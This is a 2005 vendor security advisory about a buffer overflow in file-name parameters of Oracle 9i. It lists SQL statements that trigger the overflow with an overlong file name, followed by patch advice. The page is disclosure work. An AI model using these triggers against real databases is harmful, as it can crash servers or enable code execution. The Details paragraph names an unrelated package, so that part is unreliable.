Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Buffer Overflow in File Parameter in Oracle 9i


Name Buffer Overflow Oracle File parameter in Oracle 9i (up to 9.2.0.4
Systems Affected Oracle 9i
Severity Low Risk
Category Buffer Overflow
Vendor URL http://www.oracle.com/
Credit Esteban Martinez Fayo (<argeniss>dot<com>)
Exploit http://www.appsecinc.com
Date 10 May 2005 (V 1.00)

Details

Buffer Overflow in DBMS_REPCAT_RGT. This package has EXECUTE permission granted to SYSDBA or EXECUTE_CATALOG_ROLE. Members of these groups can exploit this vulnerability and crash the database or execute arbitrary code.


Example
ALTER DATABASE RENAME FILE 'longstring' TO 'anything'; ALTER DATABASE RENAME FILE 'longstring' TO 'anything';

ALTER DATABASE BACKUP CONTROLFILE TO 'longstring';

ALTER DATABASE CREATE STANDBY CONTROLFILE AS'longstring';

ALTER TABLESPACE TablespaceName ADD TEMPFILE 'longstring';

CREATE TEMPORARY TABLESPACE TablespaceName TEMPFILE 'longstring';

ALTER DATABASE TEMPFILE 'longstring' online;

ALTER DATABASE CLEAR LOGFILE 'longstring';

ALTER DATABASE RECOVER LOGFILE 'longstring';

ALTER DATABASE DROP LOGFILE MEMBER 'longstring';

ALTER DATABASE datafile 'longstring' ONLINE;

ALTER INDEX indexname allocate extent(datafile 'longstring');

CREATE TABLESPACE tablespacename DATAFILE 'longstring';

ALTER CLUSTER clustername allocate extent(datafile 'longstring');


Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2004 or at least alert 68).




2005 by Red-Database-Security GmbH - last update 02-nov-2005

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.